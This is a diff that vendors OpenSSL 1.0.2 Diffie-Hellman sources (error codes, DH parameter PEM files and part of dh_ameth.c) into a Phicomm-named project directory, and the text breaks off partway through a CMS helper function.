+# define DH_F_DH_CMS_SET_PEERKEY                          118
+# define DH_F_DH_CMS_SET_SHARED_INFO                      119
+# define DH_F_DH_COMPUTE_KEY                              114
+# define DH_F_DH_GENERATE_KEY                             115
+# define DH_F_DH_GENERATE_PARAMETERS_EX                   116
+# define DH_F_DH_NEW_METHOD                               105
+# define DH_F_DH_PARAM_DECODE                             107
+# define DH_F_DH_PRIV_DECODE                              110
+# define DH_F_DH_PRIV_ENCODE                              111
+# define DH_F_DH_PUB_DECODE                               108
+# define DH_F_DH_PUB_ENCODE                               109
+# define DH_F_DO_DH_PRINT                                 100
+# define DH_F_GENERATE_KEY                                103
+# define DH_F_GENERATE_PARAMETERS                         104
+# define DH_F_PKEY_DH_DERIVE                              112
+# define DH_F_PKEY_DH_KEYGEN                              113
+
+/* Reason codes. */
+# define DH_R_BAD_GENERATOR                               101
+# define DH_R_BN_DECODE_ERROR                             109
+# define DH_R_BN_ERROR                                    106
+# define DH_R_DECODE_ERROR                                104
+# define DH_R_INVALID_PUBKEY                              102
+# define DH_R_KDF_PARAMETER_ERROR                         112
+# define DH_R_KEYS_NOT_SET                                108
+# define DH_R_KEY_SIZE_TOO_SMALL                          110
+# define DH_R_MODULUS_TOO_LARGE                           103
+# define DH_R_NON_FIPS_METHOD                             111
+# define DH_R_NO_PARAMETERS_SET                           107
+# define DH_R_NO_PRIVATE_VALUE                            100
+# define DH_R_PARAMETER_ENCODING_ERROR                    105
+# define DH_R_PEER_KEY_ERROR                              113
+# define DH_R_SHARED_INFO_ERROR                           114
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh1024.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh1024.pem
new file mode 100644
index 0000000..81d43f6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh1024.pem
@@ -0,0 +1,5 @@
+-----BEGIN DH PARAMETERS-----
+MIGHAoGBAJf2QmHKtQXdKCjhPx1ottPb0PMTBH9A6FbaWMsTuKG/K3g6TG1Z1fkq
+/Gz/PWk/eLI9TzFgqVAuPvr3q14a1aZeVUMTgo2oO5/y2UHe6VaJ+trqCTat3xlx
+/mNbIK9HA2RgPC3gWfVLZQrY+gz3ASHHR5nXWHEyvpuZm7m3h+irAgEC
+-----END DH PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh192.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh192.pem
new file mode 100644
index 0000000..521c072
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh192.pem
@@ -0,0 +1,3 @@
+-----BEGIN DH PARAMETERS-----
+MB4CGQDUoLoCULb9LsYm5+/WN992xxbiLQlEuIsCAQM=
+-----END DH PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh2048.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh2048.pem
new file mode 100644
index 0000000..295460f
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh2048.pem
@@ -0,0 +1,16 @@
+-----BEGIN DH PARAMETERS-----
+MIIBCAKCAQEA7ZKJNYJFVcs7+6J2WmkEYb8h86tT0s0h2v94GRFS8Q7B4lW9aG9o
+AFO5Imov5Jo0H2XMWTKKvbHbSe3fpxJmw/0hBHAY8H/W91hRGXKCeyKpNBgdL8sh
+z22SrkO2qCnHJ6PLAMXy5fsKpFmFor2tRfCzrfnggTXu2YOzzK7q62bmqVdmufEo
+pT8igNcLpvZxk5uBDvhakObMym9mX3rAEBoe8PwttggMYiiw7NuJKO4MqD1llGkW
+aVM8U2ATsCun1IKHrRxynkE1/MJ86VHeYYX8GZt2YA8z+GuzylIOKcMH6JAWzMwA
+Gbatw6QwizOhr9iMjZ0B26TE3X8LvW84wwIBAg==
+-----END DH PARAMETERS-----
+-----BEGIN DH PARAMETERS-----
+MIIBCAKCAQEArtA3w73zP6Lu3EOQtwogiXt3AXXpuS6yD4BhzNS1pZFyPHk0/an5
+8ydEkPhQZHKDW+BZJxxPLANaTudWo2YT8TgtvUdN6KSgMiEi6McwqDw+SADuvW+F
+SKUYFxG6VFIxyEP6xBdf+vhJxEDbRG2EYsHDRRtJ76gp9cSKTHusf2R+4AAVGqnt
+gRAbNqtcOar/7FSj+Pl8G3v0Bty0LcCSpbqgYlnv6z+rErQmmC6PPvSz97TDMCok
+yKpCE9hFA1zkqK3TH4FmFvGeIaXJUIBZf4mArWuBTjWFW3nmhESRUn1VK3K3x42N
+a5k6c2+EhrMFiLjxuH6JZoqL0/E93FF9SwIBAg==
+-----END DH PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh4096.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh4096.pem
new file mode 100644
index 0000000..390943a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh4096.pem
@@ -0,0 +1,14 @@
+-----BEGIN DH PARAMETERS-----
+MIICCAKCAgEA/urRnb6vkPYc/KEGXWnbCIOaKitq7ySIq9dTH7s+Ri59zs77zty7
+vfVlSe6VFTBWgYjD2XKUFmtqq6CqXMhVX5ElUDoYDpAyTH85xqNFLzFC7nKrff/H
+TFKNttp22cZE9V0IPpzedPfnQkE7aUdmF9JnDyv21Z/818O93u1B4r0szdnmEvEF
+bKuIxEHX+bp0ZR7RqE1AeifXGJX3d6tsd2PMAObxwwsv55RGkn50vHO4QxtTARr1
+rRUV5j3B3oPMgC7Offxx+98Xn45B1/G0Prp11anDsR1PGwtaCYipqsvMwQUSJtyE
+EOQWk+yFkeMe4vWv367eEi0Sd/wnC+TSXBE3pYvpYerJ8n1MceI5GQTdarJ77OW9
+bGTHmxRsLSCM1jpLdPja5jjb4siAa6EHc4qN9c/iFKS3PQPJEnX7pXKBRs5f7AF3
+W3RIGt+G9IVNZfXaS7Z/iCpgzgvKCs0VeqN38QsJGtC1aIkwOeyjPNy2G6jJ4yqH
+ovXYt/0mc00vCWeSNS1wren0pR2EiLxX0ypjjgsU1mk/Z3b/+zVf7fZSIB+nDLjb
+NPtUlJCVGnAeBK1J1nG3TQicqowOXoM6ISkdaXj5GPJdXHab2+S7cqhKGv5qC7rR
+jT6sx7RUr0CNTxzLI7muV2/a4tGmj0PSdXQdsZ7tw7gbXlaWT1+MM2MCAQI=
+-----END DH PARAMETERS-----
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh512.pem b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh512.pem
new file mode 100644
index 0000000..0a4d863
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh512.pem
@@ -0,0 +1,4 @@
+-----BEGIN DH PARAMETERS-----
+MEYCQQDaWDwW2YUiidDkr3VvTMqS3UvlM7gE+w/tlO+cikQD7VdGUNNpmdsp13Yn
+a6LT1BLiGPTdHghM9tgAPnxHdOgzAgEC
+-----END DH PARAMETERS-----
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_ameth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_ameth.c
new file mode 100644
index 0000000..a8349e7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/dh/dh_ameth.c
@@ -0,0 +1,953 @@
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 2006.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/x509.h>
+#include <openssl/asn1.h>
+#include <openssl/dh.h>
+#include <openssl/bn.h>
+#include "asn1_locl.h"
+#ifndef OPENSSL_NO_CMS
+# include <openssl/cms.h>
+#endif
+
+extern const EVP_PKEY_ASN1_METHOD dhx_asn1_meth;
+
+/*
+ * i2d/d2i like DH parameter functions which use the appropriate routine for
+ * PKCS#3 DH or X9.42 DH.
+ */
+
+static DH *d2i_dhp(const EVP_PKEY *pkey, const unsigned char **pp,
+                   long length)
+{
+    if (pkey->ameth == &dhx_asn1_meth)
+        return d2i_DHxparams(NULL, pp, length);
+    return d2i_DHparams(NULL, pp, length);
+}
+
+static int i2d_dhp(const EVP_PKEY *pkey, const DH *a, unsigned char **pp)
+{
+    if (pkey->ameth == &dhx_asn1_meth)
+        return i2d_DHxparams(a, pp);
+    return i2d_DHparams(a, pp);
+}
+
+static void int_dh_free(EVP_PKEY *pkey)
+{
+    DH_free(pkey->pkey.dh);
+}
+
+static int dh_pub_decode(EVP_PKEY *pkey, X509_PUBKEY *pubkey)
+{
+    const unsigned char *p, *pm;
+    int pklen, pmlen;
+    int ptype;
+    void *pval;
+    ASN1_STRING *pstr;
+    X509_ALGOR *palg;
+    ASN1_INTEGER *public_key = NULL;
+
+    DH *dh = NULL;
+
+    if (!X509_PUBKEY_get0_param(NULL, &p, &pklen, &palg, pubkey))
+        return 0;
+    X509_ALGOR_get0(NULL, &ptype, &pval, palg);
+
+    if (ptype != V_ASN1_SEQUENCE) {
+        DHerr(DH_F_DH_PUB_DECODE, DH_R_PARAMETER_ENCODING_ERROR);
+        goto err;
+    }
+
+    pstr = pval;
+    pm = pstr->data;
+    pmlen = pstr->length;
+
+    if (!(dh = d2i_dhp(pkey, &pm, pmlen))) {
+        DHerr(DH_F_DH_PUB_DECODE, DH_R_DECODE_ERROR);
+        goto err;
+    }
+
+    if (!(public_key = d2i_ASN1_INTEGER(NULL, &p, pklen))) {
+        DHerr(DH_F_DH_PUB_DECODE, DH_R_DECODE_ERROR);
+        goto err;
+    }
+
+    /* We have parameters now set public key */
+    if (!(dh->pub_key = ASN1_INTEGER_to_BN(public_key, NULL))) {
+        DHerr(DH_F_DH_PUB_DECODE, DH_R_BN_DECODE_ERROR);
+        goto err;
+    }
+
+    ASN1_INTEGER_free(public_key);
+    EVP_PKEY_assign(pkey, pkey->ameth->pkey_id, dh);
+    return 1;
+
+ err:
+    if (public_key)
+        ASN1_INTEGER_free(public_key);
+    if (dh)
+        DH_free(dh);
+    return 0;
+
+}
+
+static int dh_pub_encode(X509_PUBKEY *pk, const EVP_PKEY *pkey)
+{
+    DH *dh;
+    void *pval = NULL;
+    int ptype;
+    unsigned char *penc = NULL;
+    int penclen;
+    ASN1_STRING *str;
+    ASN1_INTEGER *pub_key = NULL;
+
+    dh = pkey->pkey.dh;
+
+    str = ASN1_STRING_new();
+    str->length = i2d_dhp(pkey, dh, &str->data);
+    if (str->length <= 0) {
+        DHerr(DH_F_DH_PUB_ENCODE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    pval = str;
+    ptype = V_ASN1_SEQUENCE;
+
+    pub_key = BN_to_ASN1_INTEGER(dh->pub_key, NULL);
+    if (!pub_key)
+        goto err;
+
+    penclen = i2d_ASN1_INTEGER(pub_key, &penc);
+
+    ASN1_INTEGER_free(pub_key);
+
+    if (penclen <= 0) {
+        DHerr(DH_F_DH_PUB_ENCODE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    if (X509_PUBKEY_set0_param(pk, OBJ_nid2obj(pkey->ameth->pkey_id),
+                               ptype, pval, penc, penclen))
+        return 1;
+
+ err:
+    if (penc)
+        OPENSSL_free(penc);
+    if (pval)
+        ASN1_STRING_free(pval);
+
+    return 0;
+}
+
+/*
+ * PKCS#8 DH is defined in PKCS#11 of all places. It is similar to DH in that
+ * the AlgorithmIdentifier contains the paramaters, the private key is
+ * explcitly included and the pubkey must be recalculated.
+ */
+
+static int dh_priv_decode(EVP_PKEY *pkey, PKCS8_PRIV_KEY_INFO *p8)
+{
+    const unsigned char *p, *pm;
+    int pklen, pmlen;
+    int ptype;
+    void *pval;
+    ASN1_STRING *pstr;
+    X509_ALGOR *palg;
+    ASN1_INTEGER *privkey = NULL;
+
+    DH *dh = NULL;
+
+    if (!PKCS8_pkey_get0(NULL, &p, &pklen, &palg, p8))
+        return 0;
+
+    X509_ALGOR_get0(NULL, &ptype, &pval, palg);
+
+    if (ptype != V_ASN1_SEQUENCE)
+        goto decerr;
+
+    if (!(privkey = d2i_ASN1_INTEGER(NULL, &p, pklen)))
+        goto decerr;
+
+    pstr = pval;
+    pm = pstr->data;
+    pmlen = pstr->length;
+    if (!(dh = d2i_dhp(pkey, &pm, pmlen)))
+        goto decerr;
+    /* We have parameters now set private key */
+    if (!(dh->priv_key = ASN1_INTEGER_to_BN(privkey, NULL))) {
+        DHerr(DH_F_DH_PRIV_DECODE, DH_R_BN_ERROR);
+        goto dherr;
+    }
+    /* Calculate public key */
+    if (!DH_generate_key(dh))
+        goto dherr;
+
+    EVP_PKEY_assign(pkey, pkey->ameth->pkey_id, dh);
+
+    ASN1_INTEGER_free(privkey);
+
+    return 1;
+
+ decerr:
+    DHerr(DH_F_DH_PRIV_DECODE, EVP_R_DECODE_ERROR);
+ dherr:
+    DH_free(dh);
+    return 0;
+}
+
+static int dh_priv_encode(PKCS8_PRIV_KEY_INFO *p8, const EVP_PKEY *pkey)
+{
+    ASN1_STRING *params = NULL;
+    ASN1_INTEGER *prkey = NULL;
+    unsigned char *dp = NULL;
+    int dplen;
+
+    params = ASN1_STRING_new();
+
+    if (!params) {
+        DHerr(DH_F_DH_PRIV_ENCODE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    params->length = i2d_dhp(pkey, pkey->pkey.dh, &params->data);
+    if (params->length <= 0) {
+        DHerr(DH_F_DH_PRIV_ENCODE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    params->type = V_ASN1_SEQUENCE;
+
+    /* Get private key into integer */
+    prkey = BN_to_ASN1_INTEGER(pkey->pkey.dh->priv_key, NULL);
+
+    if (!prkey) {
+        DHerr(DH_F_DH_PRIV_ENCODE, DH_R_BN_ERROR);
+        goto err;
+    }
+
+    dplen = i2d_ASN1_INTEGER(prkey, &dp);
+
+    ASN1_INTEGER_free(prkey);
+
+    if (!PKCS8_pkey_set0(p8, OBJ_nid2obj(pkey->ameth->pkey_id), 0,
+                         V_ASN1_SEQUENCE, params, dp, dplen))
+        goto err;
+
+    return 1;
+
+ err:
+    if (dp != NULL)
+        OPENSSL_free(dp);
+    if (params != NULL)
+        ASN1_STRING_free(params);
+    if (prkey != NULL)
+        ASN1_INTEGER_free(prkey);
+    return 0;
+}
+
+static void update_buflen(const BIGNUM *b, size_t *pbuflen)
+{
+    size_t i;
+    if (!b)
+        return;
+    if (*pbuflen < (i = (size_t)BN_num_bytes(b)))
+        *pbuflen = i;
+}
+
+static int dh_param_decode(EVP_PKEY *pkey,
+                           const unsigned char **pder, int derlen)
+{
+    DH *dh;
+    if (!(dh = d2i_dhp(pkey, pder, derlen))) {
+        DHerr(DH_F_DH_PARAM_DECODE, ERR_R_DH_LIB);
+        return 0;
+    }
+    EVP_PKEY_assign(pkey, pkey->ameth->pkey_id, dh);
+    return 1;
+}
+
+static int dh_param_encode(const EVP_PKEY *pkey, unsigned char **pder)
+{
+    return i2d_dhp(pkey, pkey->pkey.dh, pder);
+}
+
+static int do_dh_print(BIO *bp, const DH *x, int indent,
+                       ASN1_PCTX *ctx, int ptype)
+{
+    unsigned char *m = NULL;
+    int reason = ERR_R_BUF_LIB, ret = 0;
+    size_t buf_len = 0;
+
+    const char *ktype = NULL;
+
+    BIGNUM *priv_key, *pub_key;
+
+    if (ptype == 2)
+        priv_key = x->priv_key;
+    else
+        priv_key = NULL;
+
+    if (ptype > 0)
+        pub_key = x->pub_key;
+    else
+        pub_key = NULL;
+
+    update_buflen(x->p, &buf_len);
+
+    if (buf_len == 0) {
+        reason = ERR_R_PASSED_NULL_PARAMETER;
+        goto err;
+    }
+
+    update_buflen(x->g, &buf_len);
+    update_buflen(x->q, &buf_len);
+    update_buflen(x->j, &buf_len);
+    update_buflen(x->counter, &buf_len);
+    update_buflen(pub_key, &buf_len);
+    update_buflen(priv_key, &buf_len);
+
+    if (ptype == 2)
+        ktype = "DH Private-Key";
+    else if (ptype == 1)
+        ktype = "DH Public-Key";
+    else
+        ktype = "DH Parameters";
+
+    m = OPENSSL_malloc(buf_len + 10);
+    if (m == NULL) {
+        reason = ERR_R_MALLOC_FAILURE;
+        goto err;
+    }
+
+    BIO_indent(bp, indent, 128);
+    if (BIO_printf(bp, "%s: (%d bit)\n", ktype, BN_num_bits(x->p)) <= 0)
+        goto err;
+    indent += 4;
+
+    if (!ASN1_bn_print(bp, "private-key:", priv_key, m, indent))
+        goto err;
+    if (!ASN1_bn_print(bp, "public-key:", pub_key, m, indent))
+        goto err;
+
+    if (!ASN1_bn_print(bp, "prime:", x->p, m, indent))
+        goto err;
+    if (!ASN1_bn_print(bp, "generator:", x->g, m, indent))
+        goto err;
+    if (x->q && !ASN1_bn_print(bp, "subgroup order:", x->q, m, indent))
+        goto err;
+    if (x->j && !ASN1_bn_print(bp, "subgroup factor:", x->j, m, indent))
+        goto err;
+    if (x->seed) {
+        int i;
+        BIO_indent(bp, indent, 128);
+        BIO_puts(bp, "seed:");
+        for (i = 0; i < x->seedlen; i++) {
+            if ((i % 15) == 0) {
+                if (BIO_puts(bp, "\n") <= 0
+                    || !BIO_indent(bp, indent + 4, 128))
+                    goto err;
+            }
+            if (BIO_printf(bp, "%02x%s", x->seed[i],
+                           ((i + 1) == x->seedlen) ? "" : ":") <= 0)
+                goto err;
+        }
+        if (BIO_write(bp, "\n", 1) <= 0)
+            return (0);
+    }
+    if (x->counter && !ASN1_bn_print(bp, "counter:", x->counter, m, indent))
+        goto err;
+    if (x->length != 0) {
+        BIO_indent(bp, indent, 128);
+        if (BIO_printf(bp, "recommended-private-length: %d bits\n",
+                       (int)x->length) <= 0)
+            goto err;
+    }
+
+    ret = 1;
+    if (0) {
+ err:
+        DHerr(DH_F_DO_DH_PRINT, reason);
+    }
+    if (m != NULL)
+        OPENSSL_free(m);
+    return (ret);
+}
+
+static int int_dh_size(const EVP_PKEY *pkey)
+{
+    return (DH_size(pkey->pkey.dh));
+}
+
+static int dh_bits(const EVP_PKEY *pkey)
+{
+    return BN_num_bits(pkey->pkey.dh->p);
+}
+
+static int dh_cmp_parameters(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (BN_cmp(a->pkey.dh->p, b->pkey.dh->p) ||
+        BN_cmp(a->pkey.dh->g, b->pkey.dh->g))
+        return 0;
+    else if (a->ameth == &dhx_asn1_meth) {
+        if (BN_cmp(a->pkey.dh->q, b->pkey.dh->q))
+            return 0;
+    }
+    return 1;
+}
+
+static int int_dh_bn_cpy(BIGNUM **dst, const BIGNUM *src)
+{
+    BIGNUM *a;
+    if (src) {
+        a = BN_dup(src);
+        if (!a)
+            return 0;
+    } else
+        a = NULL;
+    if (*dst)
+        BN_free(*dst);
+    *dst = a;
+    return 1;
+}
+
+static int int_dh_param_copy(DH *to, const DH *from, int is_x942)
+{
+    if (is_x942 == -1)
+        is_x942 = ! !from->q;
+    if (!int_dh_bn_cpy(&to->p, from->p))
+        return 0;
+    if (!int_dh_bn_cpy(&to->g, from->g))
+        return 0;
+    if (is_x942) {
+        if (!int_dh_bn_cpy(&to->q, from->q))
+            return 0;
+        if (!int_dh_bn_cpy(&to->j, from->j))
+            return 0;
+        if (to->seed) {
+            OPENSSL_free(to->seed);
+            to->seed = NULL;
+            to->seedlen = 0;
+        }
+        if (from->seed) {
+            to->seed = BUF_memdup(from->seed, from->seedlen);
+            if (!to->seed)
+                return 0;
+            to->seedlen = from->seedlen;
+        }
+    } else
+        to->length = from->length;
+    return 1;
+}
+
+DH *DHparams_dup(DH *dh)
+{
+    DH *ret;
+    ret = DH_new();
+    if (!ret)
+        return NULL;
+    if (!int_dh_param_copy(ret, dh, -1)) {
+        DH_free(ret);
+        return NULL;
+    }
+    return ret;
+}
+
+static int dh_copy_parameters(EVP_PKEY *to, const EVP_PKEY *from)
+{
+    return int_dh_param_copy(to->pkey.dh, from->pkey.dh,
+                             from->ameth == &dhx_asn1_meth);
+}
+
+static int dh_missing_parameters(const EVP_PKEY *a)
+{
+    if (!a->pkey.dh->p || !a->pkey.dh->g)
+        return 1;
+    return 0;
+}
+
+static int dh_pub_cmp(const EVP_PKEY *a, const EVP_PKEY *b)
+{
+    if (dh_cmp_parameters(a, b) == 0)
+        return 0;
+    if (BN_cmp(b->pkey.dh->pub_key, a->pkey.dh->pub_key) != 0)
+        return 0;
+    else
+        return 1;
+}
+
+static int dh_param_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                          ASN1_PCTX *ctx)
+{
+    return do_dh_print(bp, pkey->pkey.dh, indent, ctx, 0);
+}
+
+static int dh_public_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                           ASN1_PCTX *ctx)
+{
+    return do_dh_print(bp, pkey->pkey.dh, indent, ctx, 1);
+}
+
+static int dh_private_print(BIO *bp, const EVP_PKEY *pkey, int indent,
+                            ASN1_PCTX *ctx)
+{
+    return do_dh_print(bp, pkey->pkey.dh, indent, ctx, 2);
+}
+
+int DHparams_print(BIO *bp, const DH *x)
+{
+    return do_dh_print(bp, x, 4, NULL, 0);
+}
+
+#ifndef OPENSSL_NO_CMS
+static int dh_cms_decrypt(CMS_RecipientInfo *ri);
+static int dh_cms_encrypt(CMS_RecipientInfo *ri);
+#endif
+
+static int dh_pkey_ctrl(EVP_PKEY *pkey, int op, long arg1, void *arg2)
+{
+    switch (op) {
+#ifndef OPENSSL_NO_CMS
+
+    case ASN1_PKEY_CTRL_CMS_ENVELOPE:
+        if (arg1 == 1)
+            return dh_cms_decrypt(arg2);
+        else if (arg1 == 0)
+            return dh_cms_encrypt(arg2);
+        return -2;
+
+    case ASN1_PKEY_CTRL_CMS_RI_TYPE:
+        *(int *)arg2 = CMS_RECIPINFO_AGREE;
+        return 1;
+#endif
+    default:
+        return -2;
+    }
+
+}
+
+const EVP_PKEY_ASN1_METHOD dh_asn1_meth = {
+    EVP_PKEY_DH,
+    EVP_PKEY_DH,
+    0,
+
+    "DH",
+    "OpenSSL PKCS#3 DH method",
+
+    dh_pub_decode,
+    dh_pub_encode,
+    dh_pub_cmp,
+    dh_public_print,
+
+    dh_priv_decode,
+    dh_priv_encode,
+    dh_private_print,
+
+    int_dh_size,
+    dh_bits,
+
+    dh_param_decode,
+    dh_param_encode,
+    dh_missing_parameters,
+    dh_copy_parameters,
+    dh_cmp_parameters,
+    dh_param_print,
+    0,
+
+    int_dh_free,
+    0
+};
+
+const EVP_PKEY_ASN1_METHOD dhx_asn1_meth = {
+    EVP_PKEY_DHX,
+    EVP_PKEY_DHX,
+    0,
+
+    "X9.42 DH",
+    "OpenSSL X9.42 DH method",
+
+    dh_pub_decode,
+    dh_pub_encode,
+    dh_pub_cmp,
+    dh_public_print,
+
+    dh_priv_decode,
+    dh_priv_encode,
+    dh_private_print,
+
+    int_dh_size,
+    dh_bits,
+
+    dh_param_decode,
+    dh_param_encode,
+    dh_missing_parameters,
+    dh_copy_parameters,
+    dh_cmp_parameters,
+    dh_param_print,
+    0,
+
+    int_dh_free,
+    dh_pkey_ctrl
+};
+
+#ifndef OPENSSL_NO_CMS
+
+static int dh_cms_set_peerkey(EVP_PKEY_CTX *pctx,
+                              X509_ALGOR *alg, ASN1_BIT_STRING *pubkey)
+{
+    ASN1_OBJECT *aoid;
+    int atype;
+    void *aval;
+    ASN1_INTEGER *public_key = NULL;
+    int rv = 0;
+    EVP_PKEY *pkpeer = NULL, *pk = NULL;
+    DH *dhpeer = NULL;
+    const unsigned char *p;
+    int plen;
+
+    X509_ALGOR_get0(&aoid, &atype, &aval, alg);
+    if (OBJ_obj2nid(aoid) != NID_dhpublicnumber)
+        goto err;
+    /* Only absent parameters allowed in RFC XXXX */
+    if (atype != V_ASN1_UNDEF && atype == V_ASN1_NULL)
+        goto err;
+
+    pk = EVP_PKEY_CTX_get0_pkey(pctx);
+    if (!pk)
+        goto err;
+    if (pk->type != EVP_PKEY_DHX)
+        goto err;
+    /* Get parameters from parent key */
+    dhpeer = DHparams_dup(pk->pkey.dh);
+    /* We have parameters now set public key */
+    plen = ASN1_STRING_length(pubkey);
+    p = ASN1_STRING_data(pubkey);
+    if (!p || !plen)
+        goto err;
+
+    if (!(public_key = d2i_ASN1_INTEGER(NULL, &p, plen))) {
+        DHerr(DH_F_DH_CMS_SET_PEERKEY, DH_R_DECODE_ERROR);
+        goto err;
+    }
+
+    /* We have parameters now set public key */
+    if (!(dhpeer->pub_key = ASN1_INTEGER_to_BN(public_key, NULL))) {
+        DHerr(DH_F_DH_CMS_SET_PEERKEY, DH_R_BN_DECODE_ERROR);
+        goto err;
+    }
+
+    pkpeer = EVP_PKEY_new();
+    if (!pkpeer)
+        goto err;
+    EVP_PKEY_assign(pkpeer, pk->ameth->pkey_id, dhpeer);
+    dhpeer = NULL;
+    if (EVP_PKEY_derive_set_peer(pctx, pkpeer) > 0)
+        rv = 1;
+ err:
+    if (public_key)
+        ASN1_INTEGER_free(public_key);
+    if (pkpeer)
+        EVP_PKEY_free(pkpeer);
+    if (dhpeer)
+        DH_free(dhpeer);
+    return rv;
+}
+
+static int dh_cms_set_shared_info(EVP_PKEY_CTX *pctx, CMS_RecipientInfo *ri)
+{
+    int rv = 0;
+
+    X509_ALGOR *alg, *kekalg = NULL;
+    ASN1_OCTET_STRING *ukm;
+    const unsigned char *p;
+    unsigned char *dukm = NULL;
+    size_t dukmlen = 0;
+    int keylen, plen;
+    const EVP_CIPHER *kekcipher;
+    EVP_CIPHER_CTX *kekctx;
+
+    if (!CMS_RecipientInfo_kari_get0_alg(ri, &alg, &ukm))
+        goto err;
+
+    /*
+     * For DH we only have one OID permissible. If ever any more get defined
+     * we will need something cleverer.
+     */
+    if (OBJ_obj2nid(alg->algorithm) != NID_id_smime_alg_ESDH) {
+        DHerr(DH_F_DH_CMS_SET_SHARED_INFO, DH_R_KDF_PARAMETER_ERROR);
+        goto err;
+    }
+
+    if (EVP_PKEY_CTX_set_dh_kdf_type(pctx, EVP_PKEY_DH_KDF_X9_42) <= 0)
+        goto err;
+
+    if (EVP_PKEY_CTX_set_dh_kdf_md(pctx, EVP_sha1()) <= 0)
+        goto err;
+
+    if (alg->parameter->type != V_ASN1_SEQUENCE)
+        goto err;
+
+    p = alg->parameter->value.sequence->data;
+    plen = alg->parameter->value.sequence->length;
+    kekalg = d2i_X509_ALGOR(NULL, &p, plen);
+    if (!kekalg)
+        goto err;
+    kekctx = CMS_RecipientInfo_kari_get0_ctx(ri);
+    if (!kekctx)
+        goto err;
+    kekcipher = EVP_get_cipherbyobj(kekalg->algorithm);
+    if (!kekcipher || EVP_CIPHER_mode(kekcipher) != EVP_CIPH_WRAP_MODE)
+        goto err;
+    if (!EVP_EncryptInit_ex(kekctx, kekcipher, NULL, NULL, NULL))
+        goto err;
